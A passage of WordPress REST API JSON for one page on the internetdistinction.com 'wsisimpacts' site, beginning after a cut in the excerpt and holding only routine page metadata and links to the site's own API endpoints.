[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":1486,"menu_order":58,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-617","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/617","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/comments?post=617"}],"version-history":[{"count":0,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/617\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/pages\/1486"}],"wp:attachment":[{"href":"https:\/\/internetdistinction.com\/wsisimpacts\/wp-json\/wp\/v2\/media?parent=617"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}